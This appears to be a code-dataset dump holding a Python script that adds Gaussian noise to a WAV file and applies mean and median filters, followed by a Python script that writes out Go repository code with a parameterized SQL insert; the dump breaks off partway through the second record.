audio_new_mean, time_new = Mean_Filter(audio, 2)
Plot_Audio(audio_new_mean)
write('Audio_with_Noise_Filtered_Mean.wav', rate, audio_new_mean)
audio_new_median, time_new = Median_Filter(audio, 2)
Plot_Audio(audio_new_median)
write('Audio_with_Noise_Filtered_Median.wav', rate, audio_new_median)
<|reserved_special_token_1|>
# We will try to implement add noise to audio file and filter it using Mean and Median Filters.
import numpy as np
import scipy
import matplotlib.pyplot as plt
from scipy.io.wavfile import read
from scipy.io.wavfile import write
rate,audio_original = read('Audio_Original.wav')
audio = audio_original[:,0]
write("Audio_Modified.wav",rate,audio)
print (audio.shape[0])
print (audio.shape[0]/rate) # Time of track
# print (audio.shape[1]) # No.of Channels
def Plot_Audio(audio): # Function to plot Audio Signal
s = audio.shape[0]
time = np.arange(s)
plt.plot(time,audio)
plt.show()
def Add_Noise(audio,mu = 0,sigma = 1): # Function to add Noise
"""
Adding Gaussian Noise
"""
gaussian_noise = np.random.normal(0, 1, audio.shape[0])
audio = audio + gaussian_noise
return audio
def Median_Filter(audio,M): # Function to apply Median Filter to audio signal
"""
audio = signal on which filter needs to be applied
M = Bandwidth of filter
"""
p,q,s = M,audio.shape[0]- M,audio.shape[0]
audio_change = np.zeros(s+2*M)
audio_change[M:s+M] = audio
audio_new = np.zeros(s)
for i in range(M,s+M):
audio_new[i-M] = np.median(audio_change[i-M:i+M])
time = np.arange(s)
return audio_new,time
def Mean_Filter(audio, M):
    """Apply a centred moving-average (mean) filter to a 1-D signal.

    audio = signal on which the filter is applied (1-D numpy array)
    M = half-width of the filter; each output sample is the mean of the
        2*M + 1 input samples centred on it (zero-padded at the edges)

    Returns (filtered_signal, sample_index_array).
    """
    s = audio.shape[0]
    # Zero-pad M samples on each side so the window never runs off the end.
    audio_change = np.zeros(s + 2 * M)
    audio_change[M:s + M] = audio
    audio_new = np.zeros(s)
    for i in range(M, s + M):
        # Bug fix: the slice previously ended at i + M (exclusive), which
        # dropped the right-most sample and made the window asymmetric.
        audio_new[i - M] = np.mean(audio_change[i - M:i + M + 1])
    time = np.arange(s)
    return audio_new, time
# Show the clean signal, then corrupt it with Gaussian noise and save it.
Plot_Audio(audio)
audio = Add_Noise(audio)
Plot_Audio(audio)
write("Audio_with_Noise.wav",rate,audio)  # noisy track on disk
# Denoise with the mean filter (M=2), plot and save the result.
audio_new_mean,time_new = Mean_Filter(audio,2)
Plot_Audio(audio_new_mean)
write("Audio_with_Noise_Filtered_Mean.wav",rate,audio_new_mean)  # mean-filtered signal
# Denoise with the median filter (M=2), plot and save the result.
audio_new_median,time_new = Median_Filter(audio,2)
Plot_Audio(audio_new_median)
write("Audio_with_Noise_Filtered_Median.wav",rate,audio_new_median)  # median-filtered signal
|
flexible
|
{
"blob_id": "844b8e2d4f05a51282b356c995f2733d6935a5d6",
"index": 5552,
"step-1": "<mask token>\n\n\ndef Plot_Audio(audio):\n s = audio.shape[0]\n time = np.arange(s)\n plt.plot(time, audio)\n plt.show()\n\n\ndef Add_Noise(audio, mu=0, sigma=1):\n \"\"\"\n\tAdding Gaussian Noise\n\t\"\"\"\n gaussian_noise = np.random.normal(0, 1, audio.shape[0])\n audio = audio + gaussian_noise\n return audio\n\n\ndef Median_Filter(audio, M):\n \"\"\"\n\taudio = signal on which filter needs to be applied\n\tM = Bandwidth of filter\n\t\"\"\"\n p, q, s = M, audio.shape[0] - M, audio.shape[0]\n audio_change = np.zeros(s + 2 * M)\n audio_change[M:s + M] = audio\n audio_new = np.zeros(s)\n for i in range(M, s + M):\n audio_new[i - M] = np.median(audio_change[i - M:i + M])\n time = np.arange(s)\n return audio_new, time\n\n\ndef Mean_Filter(audio, M):\n \"\"\"\n\taudio = signal on which filter needs to be applied\n\tM = Bandwidth of filter\n\t\"\"\"\n p, q, s = M, audio.shape[0] - M, audio.shape[0]\n audio_change = np.zeros(s + 2 * M)\n audio_change[M:s + M] = audio\n audio_new = np.zeros(s)\n for i in range(M, s + M):\n audio_new[i - M] = np.mean(audio_change[i - M:i + M])\n time = np.arange(s)\n return audio_new, time\n\n\n<mask token>\n",
"step-2": "<mask token>\nwrite('Audio_Modified.wav', rate, audio)\nprint(audio.shape[0])\nprint(audio.shape[0] / rate)\n\n\ndef Plot_Audio(audio):\n s = audio.shape[0]\n time = np.arange(s)\n plt.plot(time, audio)\n plt.show()\n\n\ndef Add_Noise(audio, mu=0, sigma=1):\n \"\"\"\n\tAdding Gaussian Noise\n\t\"\"\"\n gaussian_noise = np.random.normal(0, 1, audio.shape[0])\n audio = audio + gaussian_noise\n return audio\n\n\ndef Median_Filter(audio, M):\n \"\"\"\n\taudio = signal on which filter needs to be applied\n\tM = Bandwidth of filter\n\t\"\"\"\n p, q, s = M, audio.shape[0] - M, audio.shape[0]\n audio_change = np.zeros(s + 2 * M)\n audio_change[M:s + M] = audio\n audio_new = np.zeros(s)\n for i in range(M, s + M):\n audio_new[i - M] = np.median(audio_change[i - M:i + M])\n time = np.arange(s)\n return audio_new, time\n\n\ndef Mean_Filter(audio, M):\n \"\"\"\n\taudio = signal on which filter needs to be applied\n\tM = Bandwidth of filter\n\t\"\"\"\n p, q, s = M, audio.shape[0] - M, audio.shape[0]\n audio_change = np.zeros(s + 2 * M)\n audio_change[M:s + M] = audio\n audio_new = np.zeros(s)\n for i in range(M, s + M):\n audio_new[i - M] = np.mean(audio_change[i - M:i + M])\n time = np.arange(s)\n return audio_new, time\n\n\nPlot_Audio(audio)\n<mask token>\nPlot_Audio(audio)\nwrite('Audio_with_Noise.wav', rate, audio)\n<mask token>\nPlot_Audio(audio_new_mean)\nwrite('Audio_with_Noise_Filtered_Mean.wav', rate, audio_new_mean)\n<mask token>\nPlot_Audio(audio_new_median)\nwrite('Audio_with_Noise_Filtered_Median.wav', rate, audio_new_median)\n",
"step-3": "<mask token>\nrate, audio_original = read('Audio_Original.wav')\naudio = audio_original[:, 0]\nwrite('Audio_Modified.wav', rate, audio)\nprint(audio.shape[0])\nprint(audio.shape[0] / rate)\n\n\ndef Plot_Audio(audio):\n s = audio.shape[0]\n time = np.arange(s)\n plt.plot(time, audio)\n plt.show()\n\n\ndef Add_Noise(audio, mu=0, sigma=1):\n \"\"\"\n\tAdding Gaussian Noise\n\t\"\"\"\n gaussian_noise = np.random.normal(0, 1, audio.shape[0])\n audio = audio + gaussian_noise\n return audio\n\n\ndef Median_Filter(audio, M):\n \"\"\"\n\taudio = signal on which filter needs to be applied\n\tM = Bandwidth of filter\n\t\"\"\"\n p, q, s = M, audio.shape[0] - M, audio.shape[0]\n audio_change = np.zeros(s + 2 * M)\n audio_change[M:s + M] = audio\n audio_new = np.zeros(s)\n for i in range(M, s + M):\n audio_new[i - M] = np.median(audio_change[i - M:i + M])\n time = np.arange(s)\n return audio_new, time\n\n\ndef Mean_Filter(audio, M):\n \"\"\"\n\taudio = signal on which filter needs to be applied\n\tM = Bandwidth of filter\n\t\"\"\"\n p, q, s = M, audio.shape[0] - M, audio.shape[0]\n audio_change = np.zeros(s + 2 * M)\n audio_change[M:s + M] = audio\n audio_new = np.zeros(s)\n for i in range(M, s + M):\n audio_new[i - M] = np.mean(audio_change[i - M:i + M])\n time = np.arange(s)\n return audio_new, time\n\n\nPlot_Audio(audio)\naudio = Add_Noise(audio)\nPlot_Audio(audio)\nwrite('Audio_with_Noise.wav', rate, audio)\naudio_new_mean, time_new = Mean_Filter(audio, 2)\nPlot_Audio(audio_new_mean)\nwrite('Audio_with_Noise_Filtered_Mean.wav', rate, audio_new_mean)\naudio_new_median, time_new = Median_Filter(audio, 2)\nPlot_Audio(audio_new_median)\nwrite('Audio_with_Noise_Filtered_Median.wav', rate, audio_new_median)\n",
"step-4": "import numpy as np\nimport scipy\nimport matplotlib.pyplot as plt\nfrom scipy.io.wavfile import read\nfrom scipy.io.wavfile import write\nrate, audio_original = read('Audio_Original.wav')\naudio = audio_original[:, 0]\nwrite('Audio_Modified.wav', rate, audio)\nprint(audio.shape[0])\nprint(audio.shape[0] / rate)\n\n\ndef Plot_Audio(audio):\n s = audio.shape[0]\n time = np.arange(s)\n plt.plot(time, audio)\n plt.show()\n\n\ndef Add_Noise(audio, mu=0, sigma=1):\n \"\"\"\n\tAdding Gaussian Noise\n\t\"\"\"\n gaussian_noise = np.random.normal(0, 1, audio.shape[0])\n audio = audio + gaussian_noise\n return audio\n\n\ndef Median_Filter(audio, M):\n \"\"\"\n\taudio = signal on which filter needs to be applied\n\tM = Bandwidth of filter\n\t\"\"\"\n p, q, s = M, audio.shape[0] - M, audio.shape[0]\n audio_change = np.zeros(s + 2 * M)\n audio_change[M:s + M] = audio\n audio_new = np.zeros(s)\n for i in range(M, s + M):\n audio_new[i - M] = np.median(audio_change[i - M:i + M])\n time = np.arange(s)\n return audio_new, time\n\n\ndef Mean_Filter(audio, M):\n \"\"\"\n\taudio = signal on which filter needs to be applied\n\tM = Bandwidth of filter\n\t\"\"\"\n p, q, s = M, audio.shape[0] - M, audio.shape[0]\n audio_change = np.zeros(s + 2 * M)\n audio_change[M:s + M] = audio\n audio_new = np.zeros(s)\n for i in range(M, s + M):\n audio_new[i - M] = np.mean(audio_change[i - M:i + M])\n time = np.arange(s)\n return audio_new, time\n\n\nPlot_Audio(audio)\naudio = Add_Noise(audio)\nPlot_Audio(audio)\nwrite('Audio_with_Noise.wav', rate, audio)\naudio_new_mean, time_new = Mean_Filter(audio, 2)\nPlot_Audio(audio_new_mean)\nwrite('Audio_with_Noise_Filtered_Mean.wav', rate, audio_new_mean)\naudio_new_median, time_new = Median_Filter(audio, 2)\nPlot_Audio(audio_new_median)\nwrite('Audio_with_Noise_Filtered_Median.wav', rate, audio_new_median)\n",
"step-5": "# We will try to implement add noise to audio file and filter it using Mean and Median Filters.\n\nimport numpy as np\nimport scipy\nimport matplotlib.pyplot as plt\nfrom scipy.io.wavfile import read\nfrom scipy.io.wavfile import write\n\n\nrate,audio_original = read('Audio_Original.wav')\naudio = audio_original[:,0]\nwrite(\"Audio_Modified.wav\",rate,audio)\nprint (audio.shape[0])\nprint (audio.shape[0]/rate)\t\t\t\t\t\t\t\t\t\t\t\t# Time of track\n# print (audio.shape[1])\t\t\t\t\t\t\t\t\t\t\t\t# No.of Channels\n\ndef Plot_Audio(audio):\t\t\t\t\t\t\t\t\t\t\t\t\t# Function to plot Audio Signal\n\ts = audio.shape[0]\n\ttime = np.arange(s)\n\tplt.plot(time,audio)\n\tplt.show()\n\ndef Add_Noise(audio,mu = 0,sigma = 1):\t\t\t\t\t\t\t\t\t# Function to add Noise\n\t\"\"\"\n\tAdding Gaussian Noise\n\t\"\"\"\n\tgaussian_noise = np.random.normal(0, 1, audio.shape[0])\n\taudio = audio + gaussian_noise\n\t\n\treturn audio\n\t\ndef Median_Filter(audio,M):\t\t\t\t\t\t\t\t\t\t\t\t# Function to apply Median Filter to audio signal\n\t\"\"\"\n\taudio = signal on which filter needs to be applied\n\tM = Bandwidth of filter\n\t\"\"\"\n\tp,q,s = M,audio.shape[0]- M,audio.shape[0]\n\taudio_change = np.zeros(s+2*M)\n\taudio_change[M:s+M] = audio\n\taudio_new = np.zeros(s)\n\t\t\n\tfor i in range(M,s+M):\n\t\taudio_new[i-M] = np.median(audio_change[i-M:i+M])\n\t\n\ttime = np.arange(s)\t\n\t\n\treturn audio_new,time\n\ndef Mean_Filter(audio,M):\t\t\t\t\t\t\t\t\t\t\t\t# Function to apply Mean Filter to audio signal\n\t\"\"\"\n\taudio = signal on which filter needs to be applied\n\tM = Bandwidth of filter\n\t\"\"\"\n\tp,q,s = M,audio.shape[0]- M,audio.shape[0]\n\taudio_change = np.zeros(s+2*M)\n\taudio_change[M:s+M] = audio\n\taudio_new = np.zeros(s)\n\t\t\n\tfor i in range(M,s+M):\n\t\taudio_new[i-M] = np.mean(audio_change[i-M:i+M])\n\t\n\ttime = np.arange(s)\t\n\t\n\treturn audio_new,time\n\nPlot_Audio(audio)\naudio = 
Add_Noise(audio)\nPlot_Audio(audio)\nwrite(\"Audio_with_Noise.wav\",rate,audio)\t\t\t\t\t\t\t\t# Creating a Audio signal with noise\n\n\naudio_new_mean,time_new = Mean_Filter(audio,2)\nPlot_Audio(audio_new_mean)\nwrite(\"Audio_with_Noise_Filtered_Mean.wav\",rate,audio_new_mean)\t\t\t# Creating filtered audio signal using Mean Filter\n\t\t\naudio_new_median,time_new = Median_Filter(audio,2)\nPlot_Audio(audio_new_median)\nwrite(\"Audio_with_Noise_Filtered_Median.wav\",rate,audio_new_median)\t\t# Creating filtered audio signal using Median Filter\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
go.write('package main\n\n')
go.write('import (\n ')
go.write(""""github.com/jmoiron/sqlx"
)
""")
go.write('type {0} struct {1}\n'.format(dictiony['dbname'], '{'))
go.write(' ID {}\n'.format(dictiony['uuid']))
go.write(' Name {}\n'.format(dictiony['varchar']))
go.write(' PhoneNumber {}\n'.format(dictiony['varchar']))
go.write(' Address {}\n'.format(dictiony['varchar']))
go.write(' Description {}\n'.format(dictiony['varchar']))
go.write('}\n\n')
go.write('type {0}Repo struct {1}\n'.format(dictiony['dbname'], '{'))
go.write(""" db *sqlx.DB
}
""")
go.write('type {0}I interface {1}\n'.format(dictiony['dbname'], '{'))
go.write(""" Create(*{0}) (string, error)
{1}
""".format(dictiony[
'dbname'], '}'))
go.write('func New{0}(db *sqlx.DB) {1} {2}\n'.format(dictiony['dbname'],
dictiony['interface'], '{'))
go.write(' return &{0}Repo{1}\n'.format(dictiony['dbname'], '{'))
go.write(""" db: db,
{0}
{1}
""".format('}', '}'))
go.write('func(ica *{2}Repo) Create(agent {0}) (string, error) {1}\n'.
format(dictiony['dbname'], '{', dictiony['dbname']))
go.write(' query := `INSERT INTO {} (\n'.format(dictiony['dbname']))
go.write(
""" id,
name,
phonenumber,
address,
""")
go.write(""" description)
values($1, $2, $3, $4, $5);`
""")
go.write(' prp, err := ica.db.Prepare(query)\n\n ')
go.write(' if err != nil ')
go.write('{\n')
go.write(' return "", err\n')
go.write(' }\n')
go.write(' _, err = prp.Exec(\n')
go.write(""" agent.ID,
agent.Name,
""")
go.write(
""" agent.PhoneNumber,
agent.Address,
agent.Description,
)
"""
)
go.write(' if err != nil {\n ')
go.write("""return "", err
}
""")
go.write(""" return agent.ID, err
}""")
<|reserved_special_token_1|>
<|reserved_special_token_0|>
f = open('parse.sql')
go = open('struct.go', 'w+')
dictiony = {'uuid': 'string', 'varchar': 'string', 'timestamp': 'time.Time',
'int': 'int', 'text': 'string', 'dbname': 'IndividualContrAgent',
'interface': 'IndividualContrAgentI', 'ica': 'ica'}
go.write('package main\n\n')
go.write('import (\n ')
go.write(""""github.com/jmoiron/sqlx"
)
""")
go.write('type {0} struct {1}\n'.format(dictiony['dbname'], '{'))
go.write(' ID {}\n'.format(dictiony['uuid']))
go.write(' Name {}\n'.format(dictiony['varchar']))
go.write(' PhoneNumber {}\n'.format(dictiony['varchar']))
go.write(' Address {}\n'.format(dictiony['varchar']))
go.write(' Description {}\n'.format(dictiony['varchar']))
go.write('}\n\n')
go.write('type {0}Repo struct {1}\n'.format(dictiony['dbname'], '{'))
go.write(""" db *sqlx.DB
}
""")
go.write('type {0}I interface {1}\n'.format(dictiony['dbname'], '{'))
go.write(""" Create(*{0}) (string, error)
{1}
""".format(dictiony[
'dbname'], '}'))
go.write('func New{0}(db *sqlx.DB) {1} {2}\n'.format(dictiony['dbname'],
dictiony['interface'], '{'))
go.write(' return &{0}Repo{1}\n'.format(dictiony['dbname'], '{'))
go.write(""" db: db,
{0}
{1}
""".format('}', '}'))
go.write('func(ica *{2}Repo) Create(agent {0}) (string, error) {1}\n'.
format(dictiony['dbname'], '{', dictiony['dbname']))
go.write(' query := `INSERT INTO {} (\n'.format(dictiony['dbname']))
go.write(
""" id,
name,
phonenumber,
address,
""")
go.write(""" description)
values($1, $2, $3, $4, $5);`
""")
go.write(' prp, err := ica.db.Prepare(query)\n\n ')
go.write(' if err != nil ')
go.write('{\n')
go.write(' return "", err\n')
go.write(' }\n')
go.write(' _, err = prp.Exec(\n')
go.write(""" agent.ID,
agent.Name,
""")
go.write(
""" agent.PhoneNumber,
agent.Address,
agent.Description,
)
"""
)
go.write(' if err != nil {\n ')
go.write("""return "", err
}
""")
go.write(""" return agent.ID, err
}""")
<|reserved_special_token_1|>
import sqlparse
f = open('parse.sql')
go = open('struct.go', 'w+')
dictiony = {'uuid': 'string', 'varchar': 'string', 'timestamp': 'time.Time',
'int': 'int', 'text': 'string', 'dbname': 'IndividualContrAgent',
'interface': 'IndividualContrAgentI', 'ica': 'ica'}
go.write('package main\n\n')
go.write('import (\n ')
go.write(""""github.com/jmoiron/sqlx"
)
""")
go.write('type {0} struct {1}\n'.format(dictiony['dbname'], '{'))
go.write(' ID {}\n'.format(dictiony['uuid']))
go.write(' Name {}\n'.format(dictiony['varchar']))
go.write(' PhoneNumber {}\n'.format(dictiony['varchar']))
go.write(' Address {}\n'.format(dictiony['varchar']))
go.write(' Description {}\n'.format(dictiony['varchar']))
go.write('}\n\n')
go.write('type {0}Repo struct {1}\n'.format(dictiony['dbname'], '{'))
go.write(""" db *sqlx.DB
}
""")
go.write('type {0}I interface {1}\n'.format(dictiony['dbname'], '{'))
go.write(""" Create(*{0}) (string, error)
{1}
""".format(dictiony[
'dbname'], '}'))
go.write('func New{0}(db *sqlx.DB) {1} {2}\n'.format(dictiony['dbname'],
dictiony['interface'], '{'))
go.write(' return &{0}Repo{1}\n'.format(dictiony['dbname'], '{'))
go.write(""" db: db,
{0}
{1}
""".format('}', '}'))
go.write('func(ica *{2}Repo) Create(agent {0}) (string, error) {1}\n'.
format(dictiony['dbname'], '{', dictiony['dbname']))
go.write(' query := `INSERT INTO {} (\n'.format(dictiony['dbname']))
go.write(
""" id,
name,
phonenumber,
address,
""")
go.write(""" description)
values($1, $2, $3, $4, $5);`
""")
go.write(' prp, err := ica.db.Prepare(query)\n\n ')
go.write(' if err != nil ')
go.write('{\n')
go.write(' return "", err\n')
go.write(' }\n')
go.write(' _, err = prp.Exec(\n')
go.write(""" agent.ID,
agent.Name,
""")
go.write(
""" agent.PhoneNumber,
agent.Address,
agent.Description,
)
"""
)
go.write(' if err != nil {\n ')
go.write("""return "", err
}
""")
go.write(""" return agent.ID, err
}""")
<|reserved_special_token_1|>
# Code generator: writes a Go source file (struct.go) containing a struct,
# repository type, interface and Create() method for the IndividualContrAgent
# table.
# NOTE(review): `sqlparse` is imported and parse.sql is opened, but neither is
# used anywhere below — presumably SQL-driven generation was planned. Neither
# file handle is explicitly closed or flushed.
import sqlparse

f = open("parse.sql")
go = open("struct.go", "w+")
# SQL-type -> Go-type mapping plus generator configuration values
# (target struct name, interface name, method receiver name).
dictiony = {
    "uuid": "string",
    "varchar": "string",
    "timestamp": "time.Time",
    "int": "int",
    "text": "string",
    "dbname": "IndividualContrAgent",
    "interface": "IndividualContrAgentI",
    "ica":"ica"
}
#package
go.write("package main\n\n")
#import
go.write("import (\n ")
go.write('"github.com/jmoiron/sqlx"\n)\n\n')
#struct
go.write("type {0} struct {1}\n".format(dictiony["dbname"], "{"))
go.write(" ID {}\n".format(dictiony["uuid"]))
go.write(" Name {}\n".format(dictiony["varchar"]))
go.write(" PhoneNumber {}\n".format(dictiony["varchar"]))
go.write(" Address {}\n".format(dictiony["varchar"]))
go.write(" Description {}\n".format(dictiony["varchar"]))
go.write("}\n\n")
#db struct
go.write("type {0}Repo struct {1}\n".format(dictiony["dbname"], "{"))
go.write(" db *sqlx.DB\n}\n\n")
#interface
go.write("type {0}I interface {1}\n".format(dictiony["dbname"], "{"))
go.write(" Create(*{0}) (string, error)\n{1}\n\n".format(dictiony["dbname"], "}"))
#newIndCountrAgent
go.write("func New{0}(db *sqlx.DB) {1} {2}\n".format(dictiony["dbname"],dictiony["interface"], "{"))
go.write(" return &{0}Repo{1}\n".format(dictiony["dbname"], "{"))
go.write(" db: db,\n {0}\n{1}\n\n".format("}", "}"))
#create
go.write("func(ica *{2}Repo) Create(agent {0}) (string, error) {1}\n".format(dictiony["dbname"], "{", dictiony["dbname"]))
go.write(" query := `INSERT INTO {} (\n".format(dictiony["dbname"]))
go.write(" id, \n name,\n phonenumber,\n address,\n")
go.write(" description)\n values($1, $2, $3, $4, $5);`\n")
go.write(" prp, err := ica.db.Prepare(query)\n\n ")
go.write(' if err != nil ')
go.write("{\n")
go.write(' return "", err\n')
go.write(" }\n")
go.write(" _, err = prp.Exec(\n")
go.write(" agent.ID,\n agent.Name,\n")
go.write(" agent.PhoneNumber,\n agent.Address,\n agent.Description,\n )\n")
go.write(" if err != nil {\n ")
go.write('return "", err\n }\n\n')
go.write(" return agent.ID, err\n}")
#get
|
flexible
|
{
"blob_id": "e99e558ebf5938a90f00df6593c9f75a18affcb8",
"index": 9127,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ngo.write('package main\\n\\n')\ngo.write('import (\\n ')\ngo.write(\"\"\"\"github.com/jmoiron/sqlx\"\n)\n\n\"\"\")\ngo.write('type {0} struct {1}\\n'.format(dictiony['dbname'], '{'))\ngo.write(' ID {}\\n'.format(dictiony['uuid']))\ngo.write(' Name {}\\n'.format(dictiony['varchar']))\ngo.write(' PhoneNumber {}\\n'.format(dictiony['varchar']))\ngo.write(' Address {}\\n'.format(dictiony['varchar']))\ngo.write(' Description {}\\n'.format(dictiony['varchar']))\ngo.write('}\\n\\n')\ngo.write('type {0}Repo struct {1}\\n'.format(dictiony['dbname'], '{'))\ngo.write(\"\"\" db *sqlx.DB\n}\n\n\"\"\")\ngo.write('type {0}I interface {1}\\n'.format(dictiony['dbname'], '{'))\ngo.write(\"\"\" Create(*{0}) (string, error)\n{1}\n\n\"\"\".format(dictiony[\n 'dbname'], '}'))\ngo.write('func New{0}(db *sqlx.DB) {1} {2}\\n'.format(dictiony['dbname'],\n dictiony['interface'], '{'))\ngo.write(' return &{0}Repo{1}\\n'.format(dictiony['dbname'], '{'))\ngo.write(\"\"\" db: db,\n {0}\n{1}\n\n\"\"\".format('}', '}'))\ngo.write('func(ica *{2}Repo) Create(agent {0}) (string, error) {1}\\n'.\n format(dictiony['dbname'], '{', dictiony['dbname']))\ngo.write(' query := `INSERT INTO {} (\\n'.format(dictiony['dbname']))\ngo.write(\n \"\"\" id, \n name,\n phonenumber,\n address,\n\"\"\")\ngo.write(\"\"\" description)\n values($1, $2, $3, $4, $5);`\n\"\"\")\ngo.write(' prp, err := ica.db.Prepare(query)\\n\\n ')\ngo.write(' if err != nil ')\ngo.write('{\\n')\ngo.write(' return \"\", err\\n')\ngo.write(' }\\n')\ngo.write(' _, err = prp.Exec(\\n')\ngo.write(\"\"\" agent.ID,\n agent.Name,\n\"\"\")\ngo.write(\n \"\"\" agent.PhoneNumber,\n agent.Address,\n agent.Description,\n )\n\"\"\"\n )\ngo.write(' if err != nil {\\n ')\ngo.write(\"\"\"return \"\", err\n }\n\n\"\"\")\ngo.write(\"\"\" return agent.ID, err\n}\"\"\")\n",
"step-3": "<mask token>\nf = open('parse.sql')\ngo = open('struct.go', 'w+')\ndictiony = {'uuid': 'string', 'varchar': 'string', 'timestamp': 'time.Time',\n 'int': 'int', 'text': 'string', 'dbname': 'IndividualContrAgent',\n 'interface': 'IndividualContrAgentI', 'ica': 'ica'}\ngo.write('package main\\n\\n')\ngo.write('import (\\n ')\ngo.write(\"\"\"\"github.com/jmoiron/sqlx\"\n)\n\n\"\"\")\ngo.write('type {0} struct {1}\\n'.format(dictiony['dbname'], '{'))\ngo.write(' ID {}\\n'.format(dictiony['uuid']))\ngo.write(' Name {}\\n'.format(dictiony['varchar']))\ngo.write(' PhoneNumber {}\\n'.format(dictiony['varchar']))\ngo.write(' Address {}\\n'.format(dictiony['varchar']))\ngo.write(' Description {}\\n'.format(dictiony['varchar']))\ngo.write('}\\n\\n')\ngo.write('type {0}Repo struct {1}\\n'.format(dictiony['dbname'], '{'))\ngo.write(\"\"\" db *sqlx.DB\n}\n\n\"\"\")\ngo.write('type {0}I interface {1}\\n'.format(dictiony['dbname'], '{'))\ngo.write(\"\"\" Create(*{0}) (string, error)\n{1}\n\n\"\"\".format(dictiony[\n 'dbname'], '}'))\ngo.write('func New{0}(db *sqlx.DB) {1} {2}\\n'.format(dictiony['dbname'],\n dictiony['interface'], '{'))\ngo.write(' return &{0}Repo{1}\\n'.format(dictiony['dbname'], '{'))\ngo.write(\"\"\" db: db,\n {0}\n{1}\n\n\"\"\".format('}', '}'))\ngo.write('func(ica *{2}Repo) Create(agent {0}) (string, error) {1}\\n'.\n format(dictiony['dbname'], '{', dictiony['dbname']))\ngo.write(' query := `INSERT INTO {} (\\n'.format(dictiony['dbname']))\ngo.write(\n \"\"\" id, \n name,\n phonenumber,\n address,\n\"\"\")\ngo.write(\"\"\" description)\n values($1, $2, $3, $4, $5);`\n\"\"\")\ngo.write(' prp, err := ica.db.Prepare(query)\\n\\n ')\ngo.write(' if err != nil ')\ngo.write('{\\n')\ngo.write(' return \"\", err\\n')\ngo.write(' }\\n')\ngo.write(' _, err = prp.Exec(\\n')\ngo.write(\"\"\" agent.ID,\n agent.Name,\n\"\"\")\ngo.write(\n \"\"\" agent.PhoneNumber,\n agent.Address,\n agent.Description,\n )\n\"\"\"\n )\ngo.write(' if err != nil {\\n 
')\ngo.write(\"\"\"return \"\", err\n }\n\n\"\"\")\ngo.write(\"\"\" return agent.ID, err\n}\"\"\")\n",
"step-4": "import sqlparse\nf = open('parse.sql')\ngo = open('struct.go', 'w+')\ndictiony = {'uuid': 'string', 'varchar': 'string', 'timestamp': 'time.Time',\n 'int': 'int', 'text': 'string', 'dbname': 'IndividualContrAgent',\n 'interface': 'IndividualContrAgentI', 'ica': 'ica'}\ngo.write('package main\\n\\n')\ngo.write('import (\\n ')\ngo.write(\"\"\"\"github.com/jmoiron/sqlx\"\n)\n\n\"\"\")\ngo.write('type {0} struct {1}\\n'.format(dictiony['dbname'], '{'))\ngo.write(' ID {}\\n'.format(dictiony['uuid']))\ngo.write(' Name {}\\n'.format(dictiony['varchar']))\ngo.write(' PhoneNumber {}\\n'.format(dictiony['varchar']))\ngo.write(' Address {}\\n'.format(dictiony['varchar']))\ngo.write(' Description {}\\n'.format(dictiony['varchar']))\ngo.write('}\\n\\n')\ngo.write('type {0}Repo struct {1}\\n'.format(dictiony['dbname'], '{'))\ngo.write(\"\"\" db *sqlx.DB\n}\n\n\"\"\")\ngo.write('type {0}I interface {1}\\n'.format(dictiony['dbname'], '{'))\ngo.write(\"\"\" Create(*{0}) (string, error)\n{1}\n\n\"\"\".format(dictiony[\n 'dbname'], '}'))\ngo.write('func New{0}(db *sqlx.DB) {1} {2}\\n'.format(dictiony['dbname'],\n dictiony['interface'], '{'))\ngo.write(' return &{0}Repo{1}\\n'.format(dictiony['dbname'], '{'))\ngo.write(\"\"\" db: db,\n {0}\n{1}\n\n\"\"\".format('}', '}'))\ngo.write('func(ica *{2}Repo) Create(agent {0}) (string, error) {1}\\n'.\n format(dictiony['dbname'], '{', dictiony['dbname']))\ngo.write(' query := `INSERT INTO {} (\\n'.format(dictiony['dbname']))\ngo.write(\n \"\"\" id, \n name,\n phonenumber,\n address,\n\"\"\")\ngo.write(\"\"\" description)\n values($1, $2, $3, $4, $5);`\n\"\"\")\ngo.write(' prp, err := ica.db.Prepare(query)\\n\\n ')\ngo.write(' if err != nil ')\ngo.write('{\\n')\ngo.write(' return \"\", err\\n')\ngo.write(' }\\n')\ngo.write(' _, err = prp.Exec(\\n')\ngo.write(\"\"\" agent.ID,\n agent.Name,\n\"\"\")\ngo.write(\n \"\"\" agent.PhoneNumber,\n agent.Address,\n agent.Description,\n )\n\"\"\"\n )\ngo.write(' if err != nil {\\n 
')\ngo.write(\"\"\"return \"\", err\n }\n\n\"\"\")\ngo.write(\"\"\" return agent.ID, err\n}\"\"\")\n",
"step-5": "import sqlparse\n\nf = open(\"parse.sql\")\ngo = open(\"struct.go\", \"w+\")\ndictiony = {\n \"uuid\": \"string\",\n \"varchar\": \"string\",\n \"timestamp\": \"time.Time\",\n \"int\": \"int\",\n \"text\": \"string\",\n \"dbname\": \"IndividualContrAgent\",\n \"interface\": \"IndividualContrAgentI\",\n \"ica\":\"ica\"\n}\n#package\ngo.write(\"package main\\n\\n\")\n\n#import\ngo.write(\"import (\\n \")\ngo.write('\"github.com/jmoiron/sqlx\"\\n)\\n\\n')\n\n#struct\ngo.write(\"type {0} struct {1}\\n\".format(dictiony[\"dbname\"], \"{\"))\ngo.write(\" ID {}\\n\".format(dictiony[\"uuid\"]))\ngo.write(\" Name {}\\n\".format(dictiony[\"varchar\"]))\ngo.write(\" PhoneNumber {}\\n\".format(dictiony[\"varchar\"]))\ngo.write(\" Address {}\\n\".format(dictiony[\"varchar\"]))\ngo.write(\" Description {}\\n\".format(dictiony[\"varchar\"]))\ngo.write(\"}\\n\\n\")\n\n#db struct\ngo.write(\"type {0}Repo struct {1}\\n\".format(dictiony[\"dbname\"], \"{\"))\ngo.write(\" db *sqlx.DB\\n}\\n\\n\")\n\n#interface\ngo.write(\"type {0}I interface {1}\\n\".format(dictiony[\"dbname\"], \"{\"))\ngo.write(\" Create(*{0}) (string, error)\\n{1}\\n\\n\".format(dictiony[\"dbname\"], \"}\"))\n\n#newIndCountrAgent\ngo.write(\"func New{0}(db *sqlx.DB) {1} {2}\\n\".format(dictiony[\"dbname\"],dictiony[\"interface\"], \"{\"))\ngo.write(\" return &{0}Repo{1}\\n\".format(dictiony[\"dbname\"], \"{\"))\ngo.write(\" db: db,\\n {0}\\n{1}\\n\\n\".format(\"}\", \"}\"))\n\n#create\ngo.write(\"func(ica 